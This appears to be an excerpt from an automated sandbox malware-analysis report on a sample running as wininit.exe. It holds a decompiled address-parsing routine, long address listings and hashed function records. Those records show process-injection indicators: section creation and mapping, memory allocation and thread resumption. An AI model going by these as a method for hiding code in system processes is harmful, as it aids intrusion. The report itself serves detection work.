								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E0092685D(_t167, 4) == 0) {
								if(E0092685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E0092685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E0092685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E00908980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E008FDFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E0092EE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E0092EE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

























                                                0x0092fcd1
                                                0x0092fcd6
                                                0x0092fcd9
                                                0x0092fcdc
                                                0x0092fcdf
                                                0x0092fce2
                                                0x0092fce5
                                                0x0092fce8
                                                0x0092fceb
                                                0x0092fced
                                                0x0092fced
                                                0x0092fcf3
                                                0x00000000
                                                0x00000000
                                                0x0092fcfc
                                                0x0092fcfe
                                                0x0092fdc1
                                                0x0095ecbd
                                                0x00000000
                                                0x0095eccc
                                                0x0095eccc
                                                0x0095ecd2
                                                0x00000000
                                                0x00000000
                                                0x0095ecdf
                                                0x0095ece0
                                                0x0095ece4
                                                0x0095eceb
                                                0x0095ecee
                                                0x0095eca8
                                                0x0095eca8
                                                0x0095ecaa
                                                0x0092fd76
                                                0x0092fd79
                                                0x0092fdb4
                                                0x0092fdb5
                                                0x0092fdb6
                                                0x00000000
                                                0x0092fdb6
                                                0x0092fd7e
                                                0x0095ecfc
                                                0x0092fe2f
                                                0x00000000
                                                0x0092fe2f
                                                0x0095ed08
                                                0x0095ed0f
                                                0x0095ed17
                                                0x0095ed1b
                                                0x00000000
                                                0x0095ed1b
                                                0x0092fd88
                                                0x00000000
                                                0x00000000
                                                0x0092fd94
                                                0x0092fd99
                                                0x0092fda1
                                                0x00000000
                                                0x00000000
                                                0x0092fdb0
                                                0x00000000
                                                0x0092fdb0
                                                0x0095ecbd
                                                0x0092fdc7
                                                0x0092fdcb
                                                0x00000000
                                                0x0092fdd7
                                                0x0092fde3
                                                0x0092fe06
                                                0x00941fe7
                                                0x00000000
                                                0x00000000
                                                0x00941fef
                                                0x00941ff0
                                                0x00941ff4
                                                0x00941ff7
                                                0x00941ffa
                                                0x00941ffd
                                                0x00942000
                                                0x00000000
                                                0x00000000
                                                0x0095ecf1
                                                0x00000000
                                                0x0095ecf1
                                                0x00000000
                                                0x0092fe06
                                                0x0092fde8
                                                0x0092fdec
                                                0x0092fdef
                                                0x0092fdf2
                                                0x00000000
                                                0x0092fdf2
                                                0x0092fdcb
                                                0x0092fd04
                                                0x0092fd05
                                                0x0095ec67
                                                0x00000000
                                                0x00000000
                                                0x0095ec6f
                                                0x00000000
                                                0x0095ec6f
                                                0x0092fd13
                                                0x0092fd3c
                                                0x0092fd40
                                                0x0095ec75
                                                0x0095ec7a
                                                0x00000000
                                                0x0095ec8a
                                                0x0095ec8a
                                                0x0095ec90
                                                0x0095ecb2
                                                0x0092fd73
                                                0x0092fd73
                                                0x00000000
                                                0x0092fd73
                                                0x0095ec95
                                                0x00000000
                                                0x00000000
                                                0x0095eca1
                                                0x0095eca4
                                                0x0095eca5
                                                0x00000000
                                                0x0095eca5
                                                0x0095ec7a
                                                0x0092fd4a
                                                0x00000000
                                                0x0092fd6e
                                                0x0092fd6e
                                                0x0092fd71
                                                0x00000000
                                                0x0092fd71
                                                0x0092fd4a
                                                0x0092fd21
                                                0x0093a3a1
                                                0x00000000
                                                0x0093a3a1
                                                0x0092fd36
                                                0x0094200b
                                                0x00942012
                                                0x00000000
                                                0x00000000
                                                0x00942018
                                                0x00000000
                                                0x00942018
                                                0x00000000
                                                0x0092fd36
                                                0x0092fe0f
                                                0x0092fe16
                                                0x0093a3ad
                                                0x00000000
                                                0x00000000
                                                0x0093a3b3
                                                0x0093a3b3
                                                0x0092fe1f
                                                0x0095ed25
                                                0x0095ed86
                                                0x00000000
                                                0x00000000
                                                0x0095ed91
                                                0x0095ed95
                                                0x0095ed95
                                                0x0095ed9a
                                                0x0095edad
                                                0x0095edb3
                                                0x0095edba
                                                0x0095edc4
                                                0x0095edc9
                                                0x00000000
                                                0x0095edcc
                                                0x0095ed2a
                                                0x0095ed55
                                                0x00000000
                                                0x00000000
                                                0x0095ed61
                                                0x0095ed66
                                                0x0095ed6e
                                                0x00000000
                                                0x00000000
                                                0x0095ed7d
                                                0x00000000
                                                0x0095ed7d
                                                0x0095ed30
                                                0x00000000
                                                0x00000000
                                                0x0095ed3c
                                                0x0095ed43
                                                0x0095ed4b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: __fassign
                                                • String ID:
                                                • API String ID: 3965848254-0
                                                • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                • Instruction ID: 716a7c8019105a1cf3c7e12b338b111390cb5ea144ab27ef37a8c7f582636b99
                                                • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                • Instruction Fuzzy Hash: 9C91C031D0022AEFDF29CF98D8556AEB7B8FF54305F20847AD841A71A6E7315B85CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Analysis Process: wininit.exe PID: 2268 Parent PID: 2472 wininit.exeCOMMON

                                                Executed Functions

                                                Function 024E9862, Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 478nativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtQueryInformationProcess.NTDLL ref: 024E99BF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2344866060.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                Similarity
                                                • API ID: InformationProcessQuery
                                                • String ID: 0
                                                • API String ID: 1778838933-4108050209
                                                • Opcode ID: 39eb83527b9dfb0958a03f1802a1a4be67d21b07a2af987d97fec1c560f0ff77
                                                • Instruction ID: 0ff32e0e88b8ea393034550a9f02639cfdfc159d9594ef7442a3445ffcb705cc
                                                • Opcode Fuzzy Hash: 39eb83527b9dfb0958a03f1802a1a4be67d21b07a2af987d97fec1c560f0ff77
                                                • Instruction Fuzzy Hash: 1CF11B70918A8C8FDFA9EF69C894AEEB7E1FB98305F40462ED44AD7250DF349641CB41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 024E93CE, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 227nativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2344866060.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                Similarity
                                                • API ID: Section$CloseCreateView
                                                • String ID: @$@
                                                • API String ID: 1133238012-149943524
                                                • Opcode ID: 2dd0556cb7a3a44c3eaa392cada0241847c7aae05cd783fd05879651b916d73c
                                                • Instruction ID: 25f93cebac376b0d86f231eae26d13c8b1dbdc710afb7ba8233cd0397ceeeed2
                                                • Opcode Fuzzy Hash: 2dd0556cb7a3a44c3eaa392cada0241847c7aae05cd783fd05879651b916d73c
                                                • Instruction Fuzzy Hash: 6661B170518B488FDB58EF68D8856AABBE0FF98315F50062EE58BC3291DF35D441CB86
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 024E93D2, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 171nativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2344866060.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                Similarity
                                                • API ID: Section$CreateView
                                                • String ID: @$@
                                                • API String ID: 1585966358-149943524
                                                • Opcode ID: 82cb147daf14df8b0d9c936528d241d68235823296eaefc453e7a0fe9bd717e9
                                                • Instruction ID: cf5bd15cd9e48f5ac913922f5920dc64159e97cb2464cf14c0e955f18748b70d
                                                • Opcode Fuzzy Hash: 82cb147daf14df8b0d9c936528d241d68235823296eaefc453e7a0fe9bd717e9
                                                • Instruction Fuzzy Hash: 83516E70618B088FDB58DF18D8956AABBE0FF88315F50062EF58AC3691DF35D581CB86
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00099D50, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40filenativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtCreateFile.NTDLL(00000060,00000000,.z`,?,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,wK,007A002E,00000000,00000060,00000000,00000000), ref: 00099D9D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID: .z`$wK
                                                • API String ID: 823142352-635088003
                                                • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                • Instruction ID: 0a441b4dce64d7bec0249cb88b86821ea0342ac4fd6d7c1531e9a6fcd94e2e80
                                                • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                • Instruction Fuzzy Hash: 60F0BDB2200208AFCB08CF88DC95EEB77ADAF8C754F158248BA1D97241C630E8118BA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 024E9DAE, Relevance: 3.1, APIs: 2, Instructions: 76nativethreadCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2344866060.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                Similarity
                                                • API ID: CloseResumeThread
                                                • String ID:
                                                • API String ID: 2308149497-0
                                                • Opcode ID: 7b4da7a0d455cc38696462cd40052f2bf395cdaf7ac6e97e0619bd9c66e01c65
                                                • Instruction ID: c016d2f1dd5b969427ebb53961d4740d0cb566fd25d0393b9e9325748719c1dc
                                                • Opcode Fuzzy Hash: 7b4da7a0d455cc38696462cd40052f2bf395cdaf7ac6e97e0619bd9c66e01c65
                                                • Instruction Fuzzy Hash: 00219330A1464D8FDB68EF59D888BAAB7E1FF8C315F40052AE50EC7390DB749581C741
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00099DFB, Relevance: 1.5, APIs: 1, Instructions: 37filenativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtReadFile.NTDLL(?,?,FFFFFFFF,000949F1,?,?,?,?,000949F1,FFFFFFFF,?,2M,?,00000000), ref: 00099E45
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: a522da8916580e3c7c5aeaeaed54270d41f11723dee6f412fb777ae6d85184c2
                                                • Instruction ID: bae8880cb219a8e5b84ed9a867341af417d485e452d0cd78a915140f914fe0cc
                                                • Opcode Fuzzy Hash: a522da8916580e3c7c5aeaeaed54270d41f11723dee6f412fb777ae6d85184c2
                                                • Instruction Fuzzy Hash: 8EF0F4B2200108AFCB04DF88DC85EEB77A9BF8C714F018248BE1DA7241D630E8118BE0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00099E00, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtReadFile.NTDLL(?,?,FFFFFFFF,000949F1,?,?,?,?,000949F1,FFFFFFFF,?,2M,?,00000000), ref: 00099E45
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                • Instruction ID: fead514cabe4814d174c9c8fb60ffadff092d031a689921e6f23a6cb00221d16
                                                • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                • Instruction Fuzzy Hash: 10F0A4B2200208AFCB14DF89DC91EEB77ADAF8C754F158248BE1D97241D630E8118BA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00099F2B, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00082D11,00002000,00003000,00000004), ref: 00099F69
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                • Opcode ID: cc3f22adf2c07fac7fc9145eba08f2b97e43eddd19fff58271f52cc2d3b5350c
                                                • Instruction ID: b9f65a80e492f9329c1d9647e4c7e7be0d37579817299acbc12e85813db80fb0
                                                • Opcode Fuzzy Hash: cc3f22adf2c07fac7fc9145eba08f2b97e43eddd19fff58271f52cc2d3b5350c
                                                • Instruction Fuzzy Hash: C7F0F8B5200209AFDB18DF88CC81EEB77A9AF8C354F118148BE5997241D631E911CBE0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00099F30, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00082D11,00002000,00003000,00000004), ref: 00099F69
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                • Instruction ID: 49c918a45e5b2d10f2cbb8b42365379f4a3975464c59e5165204c3099a04dbe1
                                                • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                • Instruction Fuzzy Hash: 67F015B2200208AFCB14DF89CC81EEB77ADAF88750F118148BE1897241C630F810CBE0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00099E80, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtClose.NTDLL(00094D10,?,?,00094D10,00000000,FFFFFFFF), ref: 00099EA5
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                • Instruction ID: 7bafa5a8a84721917e68a6eceee91e07c96d2fc345112c48b1fd92cb674e3066
                                                • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                • Instruction Fuzzy Hash: 38D01776600214ABDB10EB98CC86EE77BACEF49760F154499BA5C9B242C530FA0086E0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 021F00C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2344563978.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                • Associated: 00000009.00000002.2344559335.00000000021D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344635555.00000000022C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344640452.00000000022D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344646208.00000000022D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344651330.00000000022D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344656029.00000000022E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344707073.0000000002340000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 021F07AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2344563978.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                • Associated: 00000009.00000002.2344559335.00000000021D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344635555.00000000022C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344640452.00000000022D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344646208.00000000022D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344651330.00000000022D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344656029.00000000022E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344707073.0000000002340000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 021EFAB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2344563978.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                • Associated: 00000009.00000002.2344559335.00000000021D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344635555.00000000022C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344640452.00000000022D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344646208.00000000022D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344651330.00000000022D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344656029.00000000022E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344707073.0000000002340000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 021EFAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2344563978.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                • Associated: 00000009.00000002.2344559335.00000000021D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344635555.00000000022C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344640452.00000000022D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344646208.00000000022D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344651330.00000000022D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344656029.00000000022E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344707073.0000000002340000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 021EFAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2344563978.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                • Associated: 00000009.00000002.2344559335.00000000021D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344635555.00000000022C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344640452.00000000022D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344646208.00000000022D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344651330.00000000022D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344656029.00000000022E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344707073.0000000002340000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 021EFB50, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2344563978.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                • Associated: 00000009.00000002.2344559335.00000000021D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344635555.00000000022C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344640452.00000000022D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344646208.00000000022D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344651330.00000000022D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344656029.00000000022E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344707073.0000000002340000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 021EFB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2344563978.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                • Associated: 00000009.00000002.2344559335.00000000021D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344635555.00000000022C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344640452.00000000022D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344646208.00000000022D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344651330.00000000022D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344656029.00000000022E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344707073.0000000002340000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 021EFBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2344563978.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                • Associated: 00000009.00000002.2344559335.00000000021D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344635555.00000000022C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344640452.00000000022D0000.00000040.00000001.sdmp Download File
